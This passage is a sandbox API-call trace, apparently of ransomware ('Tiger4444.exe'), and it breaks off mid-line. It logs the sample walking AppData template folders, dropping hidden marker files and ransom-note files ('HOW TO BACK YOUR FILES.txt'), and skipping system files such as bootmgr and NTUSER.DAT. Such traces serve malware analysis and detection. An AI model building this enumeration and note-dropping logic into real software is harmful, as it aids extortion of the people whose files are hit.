(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.136] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.136] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.137] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.137] CloseHandle (hObject=0x2c8) returned 1 [0052.137] CloseHandle (hObject=0x2ac) returned 1 [0052.137] GetCurrentThreadId () returned 0xfa8 [0052.137] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc914d0 [0052.137] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0052.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc791f8 | out: hHeap=0xc50000) returned 1 [0052.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc914c8 | out: hHeap=0xc50000) returned 1 [0052.137] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0052.137] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\" [0052.137] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3" [0052.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.138] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.141] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.142] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.142] CloseHandle (hObject=0x2ac) returned 1 [0052.142] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned 66 [0052.142] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.142] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.142] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.142] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.143] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.143] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.143] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.143] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.143] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.143] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.143] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.143] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84189971, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84189971, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.143] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.143] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.143] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Managed", cAlternateFileName="")) returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="Tiger4444.exe") returned -1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2=".") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="..") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="windows") returned -1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="bootmgr") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="pagefile.sys") returned -1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="boot") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="ids.txt") returned 1 [0052.143] lstrcmpiW (lpString1="Managed", lpString2="NTUSER.DAT") returned -1 [0052.143] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="Managed" | out: lpString1="Managed") returned="Managed" [0052.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91368 [0052.143] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x96) returned 0xc84d68 [0052.143] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91370 | out: ListHead=0xc66828, ListEntry=0xc91370) returned 0xc914b0 [0052.143] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User", cAlternateFileName="")) returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="Tiger4444.exe") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2=".") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="..") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="windows") returned -1 [0052.143] lstrcmpiW (lpString1="User", lpString2="bootmgr") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="pagefile.sys") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="boot") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="ids.txt") returned 1 [0052.143] lstrcmpiW (lpString1="User", lpString2="NTUSER.DAT") returned 1 [0052.144] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="User" | out: lpString1="User") returned="User" [0052.144] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91708 [0052.144] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc85a30 [0052.144] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91710 | out: ListHead=0xc66828, ListEntry=0xc91710) returned 0xc91370 [0052.144] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User", cAlternateFileName="")) returned 0 [0052.144] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.144] lstrcpyW (in: lpString1=0x30aeb2e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.144] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.144] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.144] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.144] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.144] CloseHandle (hObject=0x2c8) returned 1 [0052.145] CloseHandle (hObject=0x2ac) returned 1 [0052.145] GetCurrentThreadId () returned 0xfa8 [0052.145] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91710 [0052.145] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0052.145] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85a30 | out: hHeap=0xc50000) returned 1 [0052.145] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91708 | out: hHeap=0xc50000) returned 1 [0052.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0052.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\" [0052.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3" [0052.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.146] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.148] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.149] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.151] CloseHandle (hObject=0x2ac) returned 1 [0052.152] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned 71 [0052.152] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0052.152] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.152] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.152] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.152] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84189971, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.152] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.152] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.152] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.152] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84189971, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84189971, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x841afb43, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.153] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="Tiger4444.exe") returned -1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2=".") returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="..") returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="windows") returned -1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="bootmgr") returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="pagefile.sys") returned -1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="boot") returned 1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="ids.txt") returned -1 [0052.153] lstrcmpiW (lpString1="Document Themes", lpString2="NTUSER.DAT") returned -1 [0052.153] lstrcpyW (in: lpString1=0x30aeb38, lpString2="Document Themes" | out: lpString1="Document Themes") returned="Document Themes" [0052.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91328 [0052.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb0) returned 0xc61df8 [0052.153] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91330 | out: ListHead=0xc66828, ListEntry=0xc91330) returned 0xc91370 [0052.153] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x183f9c5e, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 0 [0052.153] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0052.153] lstrcpyW (in: lpString1=0x30aeb38, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.155] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.155] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.156] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.156] CloseHandle (hObject=0x2c8) returned 1 [0052.156] CloseHandle (hObject=0x2ac) returned 1 [0052.156] GetCurrentThreadId () returned 0xfa8 [0052.156] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91330 [0052.156] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0052.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0052.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91328 | out: hHeap=0xc50000) returned 1 [0052.156] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0052.156] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\" [0052.156] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3" [0052.156] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.157] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.159] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.160] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.161] CloseHandle (hObject=0x2ac) returned 1 [0052.162] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned 87 [0052.162] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.162] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841afb43, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0052.163] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.163] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.163] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.163] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.163] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x183f9c5e, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x183f9c5e, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x841afb43, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.163] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.163] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.163] lstrcmpiW (lpString1="..", 